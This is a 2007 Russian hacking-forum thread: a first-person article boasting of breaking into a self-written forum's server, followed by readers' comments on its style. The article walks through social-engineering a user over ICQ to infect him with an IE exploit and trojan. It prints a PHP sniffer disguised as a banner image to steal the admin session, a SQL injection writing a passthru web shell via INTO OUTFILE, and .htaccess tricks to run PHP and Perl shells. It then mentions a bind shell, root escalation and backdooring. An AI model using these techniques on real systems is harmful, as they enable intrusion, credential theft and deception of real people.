ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи

Ответ

Опции темы Поиск в этой теме Опции просмотра

Неуязвимых систем не бывает
Старый 14.06.2007, 11:48
hhover
Познающий
Провел на форуме:
79888

По умолчанию Неуязвимых систем не бывает

Зачем эта статья?
Надеюсь, что для одноразового прочтения сойдет. Просто нравятся мне такие статьи, а их мало.

Было очень жарко...
Я налил лимонного сока, положил в стакан льда, стал читать башорг, но тут вспомнил, что надо бы зломать один сервер. Я на него уже давно хотел поглядеть. На сервере не оказалось установлено ничего, кроме форума, который я и избрал своим единственным объектом атаки.

Осматриваемся...
Форум был самописный и с виду неплохо защищенный. Первым же своим действием я обнаружил администраторскую панель, просто вбив в адресную строку http://site.com/admin/. Админка была доступна, видимо, только админу (странно). Я еще поглядел баги, но, ничего не найдя, решил зарегестрироваться. На страничке регистрации я с сожалением увидел, что регистрация на форуме закрыта. И происходит только через админа. Я не стал вчитываться в то, какого содержания письмо писать админу и что в нем указывать, чтобы мне дали аккаунт, я сразу избрал другой путь.

Регистрируемся...
Я хотел сбрутить чужой аккаунт, зашел на страничку входа, и немного поубавил свой пыл, увидев там капчу. Правда капча была самой примитивной и я подумал, что можно быстро и со 100% вероятностью ее распознавать. Но перед тем, как я начал писать распознавалку, решил проверить саму авторизацию на прочность. И не зря, оказалось, что в поле hidden формы передавался md5 хеш капчи, но стоит отдать должное программеру, он передаваемый текст хитро спрятал в функции onSubmit, которая присваивала скрытому полю нужное значение прямо перед отправкой.

Итак, я быстро написал скрипт на пхп, и попытался брутить, но меня постигла неудача, на IP адрес стояло ограничение по количеству неудачных авторизаций. Я подумал было прикупить проксей, но решил что проще и надежней будет связаться с кем-нибудь из участников форума и впарить ему троя. Искать нужного человека я полез в гугл.
Я вбил запросы:
Код:
site:site.com мое мыло
site:site.com моя ася
И гугл любезно выдал мне нашел несколько людей с аськами и адресами почты. Почитав посты потенциальных жертв, я выбрал первого человека, постоянно посещающего форум, взял кривую восьмерку, сменил инфу и стукнул ему в асю. Сказал, что хочу зарегестрироваться на форуме и попросил его помочь мне с этим нелегким делом. Человек попался отзывчивый и добрый, начал рассказывать и объяснять мне все. Он рассказывал долго, а я много спрашивал. В итоге стало ясно, что он в последнюю очередь видит во мне злобного хакера, пытающегося увести его аккаунт, и в первую очередь глупую девчонку. И тогда я начал действовать:

Цитата:
Я: мммм... у меня почему-то антивирус начал говорить, что на форуме вирус, и сайт не открывается, посмотри пожалуйста!
Жертва: у меня молчит и все нормально
Я: а у тебя какой антивирус?
Жертва: я нод32 использую
Я: ну у тоже нод, может это из-за браузера? ты интернет эксплорер используешь?
Жертва: ну да, не знаю, у меня никогда ничего не находил
Я: о, я отключила фаервол и все заработало, странно, у тебя не аутпост стоит?
Жертва: нет, я без фаервола вообще сижу
Так я узнал все, что мне надо о жертве, и пока мы мило беседовали дальше, я создал страничку со сплоитом под ИЕ и троем, закриптованным от НОДа. Залил все это на старый акк jino-net, чел зашел по моему линку на флешку, и пока смотрел ее, я уже зашел на форум под его логином и паролем. Мы еще обменялись парой фраз, а потом я поехала в институт.

И что же мы получили?
Первое, что бросилось в глаза - то, что пароля в куках не было, была только сессия. Причем эта же сессия мелькала и в get запросах. Я подумал, что можно просниффать админскую сессию, но возник логичный вопрос - как? Аватары на форуме нельзя было указывать ссылками на другой сайт. Только загружать с локалхоста. А тега img не было. Никакой возможности поставить сниффер мне не предоставилось. Я поискал другие баги, но сайт бы чист. Тогда мне в голову пришла идея, как заполучить сессию админа.

Получаем админскую сессию.
На форуме было несколько рекламных мест, вверху и внизу висели баннеры 468x60, а также пару текстовых ссылок. Баннеры как ни странно были расположены на сайтах рекламодателей. У меня был шелл на сайте с похожей тематикой, я взял их баннер, разместил в отдельной папке, в которой создал также .htaccess с содержимым:
Код:
<Files "banner.jpg">
AddType application/x-httpd-php .jpg
</Files>
Скрипт banner.jpg я сделал сниффером, чтобы он логировал реферер:
Код:
<?php
// открываем файл, записываем IP, реферер на новую строку, закрываем
$fo=fopen('1.txt','ab'); 
fwrite($fo,$_SERVER['REMOTE_ADDR'].':'.$_SERVER['HTTP_REFERER']."\r\n";
fclose($fo);

// показываем картинку realbanner.jpg
header("Content-type: image/jpeg"); 
$im=imagecreatefromjpeg("./realbanner.jpg"); 
Imagejpeg($im,'',20); 
ImageDestroy($im);
?>
После я взял кривую шестерку, стукнул админу, сказал, что по вопросам размещения рекламы. Он отнесся к предложению с трепетом и излишним энтузиазмом, мы быстро договорились, было ясно, что такие предложения поступают к нему не часто и я сыграл на этом, используя очень деловой тон. Я дал ему ссылку на banner.jpg, сказал, чтобы он поставил его на сайт, и я сразу переведу деньги. Админ поставил мой баннер. Я одобрил, но вдруг обнаружил, что мой кошелек заблокирован, извинился и сказал, что стукну как только разблокирую его. Сессия админа была у меня.

Ваши права? Администратор!
Я подменил куки и вошел на форум под админом. И сразу ломанулся осматривать админ панель меня пустило без дополнительных проверок.

В админке было не очень много возможностей, я стал искать как бы мне залить шелл, но заливать файлы там было нельзя. Я старательно принялся искать любые баги и вскоре заметил, что при выполнении определенных действий с базой юзеров, в type='hidden' поле формы передается id юзера.
Я сделал на локалхосте аналог формы из админки:
Код:
<form action='http://site.com/admin_panel/index.php?action=edituser' method='post'>
<input type='text' name='user_id' value='SQL Injection' />
<input type='submit' name='submit' value='submit' />
</form>
И, попробовав послать некорректный запрос, я увидел ошибку mysql.

Поскольку я одновременно узнал и пути, и имя таблицы, я попробывал залить шелл через info outfile в директорию с аватарами, она ведь была открыта для записи, у меня получилось:
Код:
1' union select '<? passthru($_GET[cmd]) ?>' from users into outfile 
'/home/site/public_html/images/av/image.php'/*
Но вот в директории с аватарами было запрещено выполнение пхп скриптов. Как я позже узнал, запрет был при помощи следущего
текста в .htaccess:
Код:
<Files ~ "\.php">
   Order allow,deny
   Deny from all
</Files>
Я попробовал изменить расширение на .php3, и скрипт запустился.

Safe mode On
Но мой шелл не работал, потому-что safe_mod был включен. Тогда я залил простенький скрипт, при помощи которого можно было заливать файлы в определенную папку на сервер. И залил шелл от rst. Увидел уязвимое ядро, увидел, что функция eval и множество других были выключены. Я понял, что при помощи пхп ловить тут нечего. Я не мог выполнять команды, а выполнять кастрированный пхп код мог лишь заливая каждый раз новый файл. Тогда новым файлом я попытался удалить .htaccess, получилось:
Код:
<?php unlink('./.htaccess');?>
Тогда я залил perl шелл, залил новый .htaccess с содержимым:
Код:
<Directory /home/site/public_html/images/av/>
Options +ExecCGI
AddHandler cgi-script .pl
</Directory>
Этим я разрешил выполнение perl скриптов в данной директории.

Также пришлось залить простенький файл, который сменил chmod моему perl скрипту. Только тогда мой perl шелл заработал.

Полноценный шелл, это так здорово!
Итак, шелл на перле запустился. Я нашел в файле конфига инфу для доступа к бд, ничего интересного там не было. Хотя пароли хранились в открытом виде и я слил таблицу юзеров. Я залил скрипт для бинда порта, вошел на сервер netcat'ом. Дальше я использовал эксплоит для повышения прав, поимев рута, взял с сервера то, что мне было нужно, замел следы, забекдорил систему... но это уже совсем другая история...

А на улице по прежнему +30, или В заключении...
...хочу сказать - не пытайтесь повторить это дома, это опасно для жизни. Если будете повторять - не забывайте предохраняться. И помните, не бывает 100% защищенных систем. Используйте творческий подход. Иногда даже обычная XSS может дать вам рута. Не говоря уже про человеческий фактор.

Все.
Могут быть ошибки. Писал все по памяти.

Последний раз редактировалось hhover; 14.06.2007 в 16:29..

Старый 14.06.2007, 12:17
-=lebed=-
Флудер
Провел на форуме:
12702287

Хм.. статейка в стиле Ксакепа, имхо наверно мы её скоро увидим в июньском ][, я правильно понял?

ЗЫ. Имхо только сок у них апельсиновый, а не лимонный... :d

Старый 14.06.2007, 12:44
gibson
Moderator - Level 7
Провел на форуме:
2872049

Отправить сообщение для gibson с помощью ICQ

Цитата:
Дальше я использовал эксплоит для повышения прав, а поимев рута, взял с сервера то, что мне было нужно, замел следы,
забекдорил систему... но это уже совсем другая история...
вот об этом можно было и по подробней, что за ось, что за сплойты использовал, это хостинг был или нет=) а так, сильно смахивает статьи из ][

Старый 14.06.2007, 13:19
guest3297
Banned
Провел на форуме:
3887520

В принцыпе взлом банален и нечего сложно я не вижу...
Ps надо тоже попробывать свеже выжатый лимооный сок, наверное помогает хекать как **нешь пол литра лицо скосит всего вывернет и сиди хекай.
Pps Напиши статью о влиянии лимнного сока на мозг хакера.

Старый 14.06.2007, 14:30
+toxa+
[Лишённый самовыражени
Провел на форуме:
9751379

Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM

+1
банальная статья для ксакепа. хотя порадовала фишка с .htaccess'ом. большая часть была в соц инженерии, а это не всегда удачно, ибо люди разные бывают=\

Старый 16.06.2007, 10:56
k1b0rg
Тут может быть ваша реклама.
Провел на форуме:
4520553

А почему автор в статье говорит о себе то о женском то о мужском роде?

Цитата:
Я налил лимонного сока,
Цитата:
Мы еще обменялись парой фраз, а потом я поехала в институт.

Старый 16.06.2007, 11:18
Red_Red1
Участник форума
Провел на форуме:
4608122

Отправить сообщение для Red_Red1 с помощью ICQ

Цитата:
Сообщение от k1b0rg  
А почему автор в статье говорит о себе то о женском то о мужском роде?
Тут как раз все просто. Он представился девушкой.
Цитата:
Сообщение от hhover  
В итоге стало ясно, что он в последнюю очередь видит во мне злобного хакера, пытающегося увести его аккаунт, и в первую очередь глупую девчонку

Старый 16.06.2007, 19:31
genom--
Постоянный
Провел на форуме:
1948091

ой а мне такое нравится читать -- как говорил один мой учитель по информатике сказка про серенького бычка хз почему --- похоже не хеккерскую сказку -- рекомендую к прочтению перед сном для развития фантазии и предупреждения лунатизма

пойдет

Старый 16.06.2007, 20:59
Gh0s7
Участник форума
Провел на форуме:
1045663

Да, меня тоже удивило 'а потом я поехала в институт.'
Ждем доку в ксакепе?

Ответ